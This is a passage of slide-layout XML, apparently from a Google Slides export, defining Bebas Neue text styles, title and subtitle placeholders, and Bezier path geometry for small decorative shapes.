                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Google Shape;85;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5271100" y="3252350"/>
            <a:ext cx="2518500" cy="8634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86" name="Google Shape;86;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="6412200" cy="5727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36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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Google Shape;127;p8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1418900"/>
            <a:ext cx="3852000" cy="2678400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="l">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4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48"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="249" name="Google Shape;249;p13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-7" y="0"/>
            <a:ext cx="625763" cy="3288755"/>
            <a:chOff x="-7" y="0"/>
            <a:chExt cx="625763" cy="3288755"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="250" name="Google Shape;250;p13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="201918" y="63821"/>
              <a:ext cx="72619" cy="101243"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4011" h="5592" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="3663" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3555" y="1"/>
                    <a:pt x="3449" y="56"/>
                    <a:pt x="3384" y="153"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="5090"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="5241"/>
                    <a:pt x="26" y="5441"/>
                    <a:pt x="176" y="5542"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="5567"/>
                    <a:pt x="276" y="5592"/>
                    <a:pt x="351" y="5592"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="452" y="5592"/>
                    <a:pt x="552" y="5542"/>
                    <a:pt x="602" y="5441"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3910" y="504"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4011" y="354"/>
                    <a:pt x="3960" y="153"/>
                    <a:pt x="3835" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3782" y="17"/>
                    <a:pt x="3722" y="1"/>
                    <a:pt x="3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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="63976" y="15434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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="111628" y="3180578"/>
              <a:ext cx="60362" cy="108177"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3334" h="5975" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2984" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2870" y="1"/>
                    <a:pt x="2759" y="57"/>
                    <a:pt x="2707" y="160"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="75" y="5524"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="5674"/>
                    <a:pt x="75" y="5850"/>
                    <a:pt x="226" y="5925"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="276" y="5950"/>
                    <a:pt x="326" y="5975"/>
                    <a:pt x="351" y="5975"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="476" y="5975"/>
                    <a:pt x="577" y="5900"/>
                    <a:pt x="652" y="5800"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3258" y="436"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3333" y="286"/>
                    <a:pt x="3283" y="110"/>
                    <a:pt x="3133" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3086" y="12"/>
                    <a:pt x="3035" y="1"/>
                    <a:pt x="29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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="370258" y="4858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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="88472" y="25155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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="425521" y="2010319"/>
              <a:ext cx="22722" cy="22975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1255" h="1269" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="625" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="461" y="0"/>
                    <a:pt x="295" y="72"/>
                    <a:pt x="176" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="216"/>
                    <a:pt x="126" y="241"/>
                    <a:pt x="101" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="317"/>
                    <a:pt x="51" y="342"/>
                    <a:pt x="51" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="417"/>
                    <a:pt x="26" y="467"/>
                    <a:pt x="1" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="542"/>
                    <a:pt x="1" y="592"/>
                    <a:pt x="1" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="793"/>
                    <a:pt x="51" y="943"/>
                    <a:pt x="176" y="1068"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302" y="1194"/>
                    <a:pt x="452" y="1269"/>
                    <a:pt x="627" y="1269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="778" y="1269"/>
                    <a:pt x="953" y="1194"/>
                    <a:pt x="1054" y="1068"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="943"/>
                    <a:pt x="1254" y="793"/>
                    <a:pt x="1254" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1254" y="592"/>
                    <a:pt x="1254" y="542"/>
                    <a:pt x="1229" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1229" y="467"/>
                    <a:pt x="1204" y="417"/>
                    <a:pt x="1204" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="342"/>
                    <a:pt x="1154" y="317"/>
                    <a:pt x="1154" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1129" y="241"/>
                    <a:pt x="1104" y="216"/>
                    <a:pt x="1054" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1028" y="166"/>
                    <a:pt x="1003" y="141"/>
                    <a:pt x="978" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="928" y="91"/>
                    <a:pt x="903" y="66"/>
                    <a:pt x="853" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="828" y="41"/>
                    <a:pt x="778" y="16"/>
                    <a:pt x="753" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="711" y="5"/>
                    <a:pt x="668" y="0"/>
                    <a:pt x="6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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="603052" y="0"/>
              <a:ext cx="22704" cy="22595"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1254" h="1248" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="614" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="451" y="0"/>
                    <a:pt x="288" y="57"/>
                    <a:pt x="176" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="194"/>
                    <a:pt x="125" y="219"/>
                    <a:pt x="100" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="295"/>
                    <a:pt x="50" y="320"/>
                    <a:pt x="50" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="395"/>
                    <a:pt x="0" y="445"/>
                    <a:pt x="0" y="495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="520"/>
                    <a:pt x="0" y="570"/>
                    <a:pt x="0" y="620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="771"/>
                    <a:pt x="50" y="946"/>
                    <a:pt x="176" y="1047"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="1172"/>
                    <a:pt x="451" y="1247"/>
                    <a:pt x="627" y="1247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="777" y="1247"/>
                    <a:pt x="952" y="1172"/>
                    <a:pt x="1053" y="1047"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1178" y="946"/>
                    <a:pt x="1253" y="771"/>
                    <a:pt x="1253" y="620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1253" y="570"/>
                    <a:pt x="1228" y="520"/>
                    <a:pt x="1228" y="495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1228" y="445"/>
                    <a:pt x="1203" y="395"/>
                    <a:pt x="1203" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1178" y="320"/>
                    <a:pt x="1153" y="295"/>
                    <a:pt x="1128" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1103" y="219"/>
                    <a:pt x="1078" y="194"/>
                    <a:pt x="1053" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="940" y="57"/>
                    <a:pt x="777"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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-7" y="1029179"/>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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="341846" y="9701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3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8431104" y="1818952"/>
            <a:ext cx="712884" cy="3324549"/>
            <a:chOff x="8431104" y="1818952"/>
            <a:chExt cx="712884" cy="3324549"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="260" name="Google Shape;260;p13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8559523" y="273560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8955190" y="4621461"/>
              <a:ext cx="36789" cy="116379"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2032" h="6428" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="347" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="0"/>
                    <a:pt x="300" y="4"/>
                    <a:pt x="277" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="62"/>
                    <a:pt x="1" y="212"/>
                    <a:pt x="26" y="388"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1379" y="6202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1430" y="6327"/>
                    <a:pt x="1555" y="6428"/>
                    <a:pt x="1680" y="6428"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1755" y="6428"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1931" y="6378"/>
                    <a:pt x="2031" y="6227"/>
                    <a:pt x="2006" y="6052"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="653" y="237"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="610" y="110"/>
                    <a:pt x="47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8623363" y="4301955"/>
              <a:ext cx="60380" cy="108087"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3335" h="5970" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2985" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2871" y="0"/>
                    <a:pt x="2763" y="70"/>
                    <a:pt x="2708" y="180"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="5519"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="5669"/>
                    <a:pt x="51" y="5870"/>
                    <a:pt x="201" y="5945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="5970"/>
                    <a:pt x="302" y="5970"/>
                    <a:pt x="352" y="5970"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="477" y="5970"/>
                    <a:pt x="577" y="5920"/>
                    <a:pt x="627" y="5794"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3259" y="456"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3334" y="306"/>
                    <a:pt x="3259" y="105"/>
                    <a:pt x="3109" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3068" y="10"/>
                    <a:pt x="3026" y="0"/>
                    <a:pt x="2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9016004" y="2994926"/>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8809535" y="5000109"/>
              <a:ext cx="59475" cy="59457"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3285" h="3284" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1655" y="627"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2206" y="627"/>
                    <a:pt x="2657" y="1103"/>
                    <a:pt x="2657" y="1654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2657" y="2206"/>
                    <a:pt x="2206" y="2657"/>
                    <a:pt x="1655" y="2657"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1079" y="2657"/>
                    <a:pt x="627" y="2206"/>
                    <a:pt x="627" y="1654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="627" y="1103"/>
                    <a:pt x="1079" y="627"/>
                    <a:pt x="1655" y="627"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1655" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="753" y="0"/>
                    <a:pt x="1" y="752"/>
                    <a:pt x="1" y="1654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2556"/>
                    <a:pt x="753" y="3283"/>
                    <a:pt x="1655" y="3283"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2557" y="3283"/>
                    <a:pt x="3284" y="2556"/>
                    <a:pt x="3284" y="1654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3284" y="752"/>
                    <a:pt x="2557" y="0"/>
                    <a:pt x="1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a:off x="9121267" y="3702904"/>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8431104" y="5120924"/>
              <a:ext cx="22704" cy="22577"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1254" h="1247" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="615" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="452" y="0"/>
                    <a:pt x="289" y="56"/>
                    <a:pt x="176" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="294"/>
                    <a:pt x="0" y="445"/>
                    <a:pt x="0" y="620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="771"/>
                    <a:pt x="51" y="946"/>
                    <a:pt x="176" y="1071"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="1172"/>
                    <a:pt x="452" y="1247"/>
                    <a:pt x="627" y="1247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="777" y="1247"/>
                    <a:pt x="928" y="1172"/>
                    <a:pt x="1053" y="1071"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1178" y="946"/>
                    <a:pt x="1254" y="771"/>
                    <a:pt x="1254" y="620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1254" y="445"/>
                    <a:pt x="1178" y="294"/>
                    <a:pt x="1053" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="940" y="56"/>
                    <a:pt x="777" y="0"/>
                    <a:pt x="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9034598" y="1818952"/>
              <a:ext cx="22722" cy="22993"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1255" h="1270" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="603" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="446" y="0"/>
                    <a:pt x="295" y="72"/>
                    <a:pt x="176" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="216"/>
                    <a:pt x="126" y="241"/>
                    <a:pt x="101" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="317"/>
                    <a:pt x="51" y="342"/>
                    <a:pt x="51" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="417"/>
                    <a:pt x="1" y="467"/>
                    <a:pt x="1" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="542"/>
                    <a:pt x="1" y="592"/>
                    <a:pt x="1" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="793"/>
                    <a:pt x="51" y="968"/>
                    <a:pt x="176" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302" y="1194"/>
                    <a:pt x="452" y="1269"/>
                    <a:pt x="628" y="1269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="653" y="1269"/>
                    <a:pt x="703" y="1244"/>
                    <a:pt x="728" y="1244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="778" y="1244"/>
                    <a:pt x="828" y="1219"/>
                    <a:pt x="853" y="1219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="903" y="1194"/>
                    <a:pt x="928" y="1169"/>
                    <a:pt x="953" y="1144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1003" y="1119"/>
                    <a:pt x="1029" y="1094"/>
                    <a:pt x="1054" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="968"/>
                    <a:pt x="1254" y="793"/>
                    <a:pt x="1254" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1254" y="592"/>
                    <a:pt x="1229" y="542"/>
                    <a:pt x="1229" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1229" y="467"/>
                    <a:pt x="1204" y="417"/>
                    <a:pt x="1204" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="342"/>
                    <a:pt x="1154" y="317"/>
                    <a:pt x="1129" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1104" y="241"/>
                    <a:pt x="1079" y="216"/>
                    <a:pt x="1054" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1029" y="166"/>
                    <a:pt x="1003" y="141"/>
                    <a:pt x="953" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="928" y="91"/>
                    <a:pt x="903" y="66"/>
                    <a:pt x="853" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="828" y="41"/>
                    <a:pt x="778" y="16"/>
                    <a:pt x="728" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="686" y="5"/>
                    <a:pt x="644" y="0"/>
                    <a:pt x="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p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8700096" y="3562403"/>
              <a:ext cx="55383" cy="54007"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3059" h="2983" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2707" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2626" y="0"/>
                    <a:pt x="2544" y="25"/>
                    <a:pt x="2482" y="75"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="126" y="2456"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2582"/>
                    <a:pt x="0" y="2782"/>
                    <a:pt x="126" y="2907"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="2958"/>
